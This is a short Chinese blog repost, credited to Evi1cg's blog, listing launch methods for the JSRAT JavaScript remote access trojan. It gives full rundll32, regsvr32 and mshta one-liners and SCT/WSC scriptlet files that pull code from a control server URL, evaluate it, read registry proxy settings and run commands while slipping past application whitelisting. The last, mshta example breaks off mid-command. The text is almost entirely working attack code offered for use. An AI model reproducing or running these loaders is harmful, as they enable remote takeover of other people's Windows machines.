JSRAT几种启动方式
1.默认方式
1
|
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write(); h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open "GET","http://127.0.0.1:8081/connect",false);try{h.Send(); b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell"). Run("cmd /c taskkill /f /im rundll32.exe",0,true);}% 2.Use SCT 运行计算器: |
regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll |
calc.sct:
<?XML version="1.0"?> <scriptlet>
<registration description="Empire" progid="Empire" version="1.00" classid="{20001111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /i"C:BypassBackdoor.sct" scrobj.dll --> <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll --> <!-- That should work over a proxy and SSL/TLS... --> <!-- Proof Of Concept - Casey Smith @subTee --> <script language="JScript"> <![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </script> </registration>
<public> <method name="Exec"></method> </public> <script language="JScript"> <![CDATA[
function Exec() { var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); }
]]> </script>
</scriptlet> |
运行JSRAT:
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
JSRAT.sct
<?XML version="1.0"?> <scriptlet> <registration progid="ShortJSRAT" classid="{10001111-0000-0000-0000-0000FEEDACDC}" > <!-- Learn from Casey Smith @subTee --> <script language="JScript"> <![CDATA[ rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(); h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell"); try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);} catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText; eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f / im rundll32.exe",0,true);}"; new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]> </script> </registration> </scriptlet> |
3.Use WSC
运行计算器
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();GetObject
("script:http://urlto/calc.wsc")
calc.wsc
<?xml version="1.0"?>
<package> <component id="testCalc">
<script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script>
</component> </package>
|
运行JSRAT
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();GetObject
("script:http://urlto/JSRAT.wsc")
JSRAT.wsc:
<?xml version="1.0"?>
<package> <component id="testCalc">
<script language="JScript"> <![CDATA[ rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write ();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript .Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy (2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h. ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}"; new ActiveXObject("WScript.Shell").Run(rat,0,true); ]]> </script>
</component> </package> |
4.Use MSHTA
1 |
mshta javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXOb |
文章出处:Evi1cg's blog
原文链接:
https://evi1cg.me/archives/Run_JSRAT.html